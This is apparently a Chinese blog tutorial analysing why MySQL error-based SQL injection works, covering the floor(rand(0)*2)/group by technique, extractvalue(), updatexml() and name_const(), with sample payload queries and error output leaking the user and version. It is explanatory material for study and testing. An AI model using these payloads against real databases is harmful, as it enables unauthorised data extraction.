简介

这段时间学习SQL盲注中的报错注入,发现语句就是那么两句,但是一直不知道报错原因,所以看着别人的帖子学习一番,小本本记下来

(1) count() , rand() , group by

1.报错语句构造

  先直接上两个网上经常使用的报错语句,主要分析第一条,第二条是简化后的

 select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;  

 select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2));

可以看出两个句子的原理都是相同的

2.rand() floor()函数

  我们现在从最里向外分析整条语句.先从floor(rand(0)*2) 开始

  • rand()函数会随机产生[0,1)之间的浮点数.
  • rand()函数可以自己设置随机种子,即rand(N),这个时候产生的随机数是伪随机数.也就是我们多次生成的是相同的.
  • floor(N)函数会返回一个小于或等于传入参数N的最大整数(相当于截断小数部分)

  先来看一下rand()不设置随机种子的情况.

  

  可以看出来,连续执行两次的结果是完全不同的.再来看一下设置随机种子后,rand函数的值

  自己可以试一试,多次重复的值是相同的,而这里也是整个报错语句的关键.先加下前6位是 011011

3 concat()函数 0x3a的作用 别名a

  • concat()函数将字符串会将字符串拼接起来
  • 0x3a的ASCII码是 : 主要是用来分隔其他字符串,让人可以快速定位重要信息
  • 在括号后面有一个a是别名的意思,是as a的简写.它是前面语句的另一个名字,主要是为了减少重复出现复杂语句

4. group by 与 count()

  • group by a  会根据a的规则对数据进行分组,而分组的时候,mysql会建立一个临时空表进行分组.
  • count()聚散函数,会进行计数

5.报错分析

  报错的原因是因为rand()函数在查询的时候会执行一次,插入的时候还会执行一次.这就是整个语句报错的关键

前面说过floor(rand(0)*2) 前六位是011011. group by a先建立一个空表,用于分组.然后进行分组查询,第一次rand()执行,查询的结果是

0,因为是空表所以插入这条,而插入的时候rand()又执行了一次,所以表中的结果就是

第一次执行完,接着执行rand()的值为1,因为表中存在,所以加1,表中结果成为

到了第三次执行rand()是值为0,因为表中不存在所以要插入新的数据,这次插入rand()再次执行,所以插入的又是1.而表中已经存在1了

此时插入因为重复出现同一个key,就会出现报错 重复出现key.而报错中会说明那个key有问题,我们的key中结合了想要了解的字符串root@localhost

这样就实现了报错注入,拿到了自己想要的数据

这就是整个报错注入的原理了,rand(),floor() group by 函数缺一不可.

(2) XML函数之ExtractValue()

1.报错语句构造

select extractvalue(1,concat(0x7e,user(),0x7e))
 mysql> select extractvalue(1,concat(0x7e,user(),0x7e));

 ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'

2.ExtractValue()函数

  • ExtractValue(xml_str , Xpath) 函数,使用Xpath表示法从XML格式的字符串中提取一个值
  • ExtractValue()函数中任意一个参数为NULL,返回值都是NULL.
 mysql> select extractvalue('<a><b>abbb</b><c>accc<b>acbbbb</b></c>aaaa</a>','/a/c');

 +-----------------------------------------------------------------------+

 | extractvalue('<a><b>abbb</b><c>accc<b>acbbbb</b></c>aaaa</a>','/a/c') |

 +-----------------------------------------------------------------------+

 | accc                                                                  |

 +-----------------------------------------------------------------------+
 mysql> select extractvalue('<a><b>abbb</b><c>accc<b>acbbbb</b></c>aaaa</a>',NULL);

 +---------------------------------------------------------------------+

 | extractvalue('<a><b>abbb</b><c>accc<b>acbbbb</b></c>aaaa</a>',NULL) |

 +---------------------------------------------------------------------+

 | NULL                                                                |

 +---------------------------------------------------------------------+

3.报错分析

  上面说明了正常情况下的extractvalue函数使用方法,Xpath语法可以自行google.但是如果我们构造了

不符合规定的Xpath,MySQL就会报语法错误,并显示XPath的内容.

  但是什么样子的字符串会引发报错呢.

  发现报错竟然消失了一部分,前面的root不见了.因为XPATH语法报错的是那些特殊字符,遇到特殊字符就会报错.

所以0x7e,ASCII码是~ 就会从头开始报错.

  可以看出来报错会从遇到的第一个特殊字符处开始报错.直到结束.但是报错的长度是有限制的.如下图应该出现

字符串最后并没全部显示出来,而是后面的字符串被截断了.

(3)XML函数之updatexml()

1.报错语句

select updatexml(1,concat(0x7e,version(),0x7e),1) 
mysql> select updatexml(1,concat(0x7e,version(),0x7e),1);

ERROR 1105 (HY000): XPATH syntax error: '~5.7.19~'

2.updatexml()函数

  updatexml(xml,xpath,new_xml),此函数使用nex_xml根据xpath来替换xml字符串中特定的值.和上面的道理是相同的,都是通过xpath语法

错误来报错.原来也和上面的相同.不再具体描述.

(4) name_const() 重复报错(不推荐)

1.报错语句构造

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))a;
 mysql> select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))a;

 ERROR 1060 (42S21): Duplicate column name '5.7.19'

2.name_const()函数 

  name_const(name,value)函数会用传入的参数返回一列结果集.传入的参数必须是常量

 mysql> SELECT NAME_CONST('myname', 14);

 +--------+

 | myname |

 +--------+

 |     14 |

 +--------+

  如果传入的参数不是常量,就会报错.

 mysql> select name_const(database(),1);

 ERROR 1210 (HY000): Incorrect arguments to NAME_CONST

3.报错分析

  报错原因就是因为两列列名相同,外面选择时候报错,说重复列.

 mysql> select name_const(version(),1),name_const(version(),1);

 +--------+--------+

 | 5.7.19 | 5.7.19 |

 +--------+--------+

 |      1 |      1 |

 +--------+--------+

 1 row in set (0.00 sec)

  然而个人认为这个报错注入很鸡肋,没有多大用,尝试了一下只用version()函数可以使用,其他可能因为不是常量的原因.

name_const()函数会报参数错误的错误,不会回显想要的信息.

MySQL 常用报错注入原理分析的更多相关文章

  1. Mysql报错注入原理分析(count()、rand()、group by)

    Mysql报错注入原理分析(count().rand().group by) 0x00 疑问 一直在用mysql数据库报错注入方法,但为何会报错? 百度谷歌知乎了一番,发现大家都是把官网的结论发一下截 ...

  2. sql注入--双查询报错注入原理探索

    目录 双查询报错注入原理探索 part 1 场景复现 part 2 形成原因 part 3 报错原理 part 4 探索小结 双查询报错注入原理探索 上一篇讲了双查询报错查询注入,后又参考了一些博客, ...

  3. 十种MYSQL显错注入原理讲解(二)

    上一篇讲过,三种MYSQL显错注入原理.下面我继续讲解. 1.geometrycollection() and geometrycollection((select * from(select * f ...

  4. Spring依赖注入原理分析

    在分析原理之前我们先回顾下依赖注入的概念: 我们常提起的依赖注入(Dependency Injection)和控制反转(Inversion of Control)是同一个概念.具体含义是:当某个角色( ...

  5. 十种MYSQL显错注入原理讲解(一)

    开篇我要说下,在<代码审计:企业级Web代码安全架构>这本书中讲十种MYSQL显错注入,讲的很清楚. 感兴趣请去读完,若处于某种原因没读还想了解,那请继续往下. 1.count,rand, ...

  6. Mysql常见报错解决方法

    一:登录报错 ERROR 1045 (28000): Access denied for user 'mysql'@'localhost' (using password: NO) mysql日志文件 ...

  7. MYSQL主从不同步延迟原理分析及解决方案(摘自http://www.jb51.net/article/41545.htm)

    1. MySQL数据库主从同步延迟原理.要说延时原理,得从mysql的数据库主从复制原理说起,mysql的主从复制都是单线程的操作,主 库对所有DDL和DML产生binlog,binlog是顺序写,所 ...

  8. MYSQL主从不同步延迟原理分析及解决方案

    1. MySQL数据库主从同步延迟原理.要说延时原理,得从mysql的数据库主从复制原理说起,mysql的主从复制都是单线程的操作,主库对所有DDL和DML产生binlog,binlog是顺序写,所以 ...

  9. 十种MYSQL显错注入原理讲解(三)

    这回间隔时间有点长了,年前年后忙的头晕眼花,外加大病.下面我继续讲解. 1.multipolygon() and multipolygon((select * from(select * from(s ...

随机推荐

  1. Shiro单Realm加密

    首先,我们要明确认证的流程: 1. 获取当前的 Subject. 调用 SecurityUtils.getSubject(); 2. 测试当前的用户是否已经被认证. 即是否已经登录. 调用 Subje ...

  2. 在django项目中,单独运行python文件

    在from models import * 上面加上以下代码 import os; os.environ.setdefault("DJANGO_SETTINGS_MODULE", ...

  3. Maven项目构建利器04——Maven的一些核心概念

    1.坐标 1)数学上的坐标: [1].在平面上. 使用X,Y两个向量可以唯一的定位平面上的任意一个点 [2]在空间中, 使用X,Y,Z三个向量可以唯一的定位空间中的任何一个点 2)Maven中的坐标: ...

  4. linux命令详解——ln

    ln是linux中又一个非常重要命令,它的功能是为某一个文件在另外一个位置建立一个同不的链接,这个命令最常用的参数是-s,具体用法是:ln -s 源文件 目标文件. 当我们需要在不同的目录,用到相同的 ...

  5. java高并发核心要点|系列4|CPU内存指令重排序(Memory Reordering)

    今天,我们来学习另一个重要的概念. CPU内存指令重排序(Memory Reordering) 什么叫重排序? 重排序的背景 我们知道现代CPU的主频越来越高,与cache的交互次数也越来越多.当CP ...

  6. MyEclipse内存不足?这里有你想要的问题解决方案

    [MyEclipse CI 2019.4.0安装包下载] No.1 打开MyEclipse目录下的myeclipse.ini文件 在后面修改下面几个属性: vmargs Xms512m ( Java能 ...

  7. python基础31[常用模块介绍]

    python基础31[常用模块介绍]   python除了关键字(keywords)和内置的类型和函数(builtins),更多的功能是通过libraries(即modules)来提供的. 常用的li ...

  8. pt-config-diff的使用记录

    pt-config-diff的使用记录 pt-config-diff功能:比较差异两套库配置差不多,性能就是不一样,无奈之举,去比对数据库配置是否相同. 运行的MySQL和运行的MySQL做对比 [r ...

  9. MySQL报错:Cause: java.sql.SQLException: Incorrect string value: '\xE6\x9D\xA8","...' for column 'obj_value' at row 1

    1.插入MySQL表时,报错:Cause: java.sql.SQLException: Incorrect string value: '\xE6\x9D\xA8","...' ...

  10. 正则爬取京东商品信息并打包成.exe可执行程序

    本文爬取内容,输入要搜索的关键字可自动爬取京东网站上相关商品的店铺名称,商品名称,价格,爬取100页(共100页) 代码如下: ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 1 ...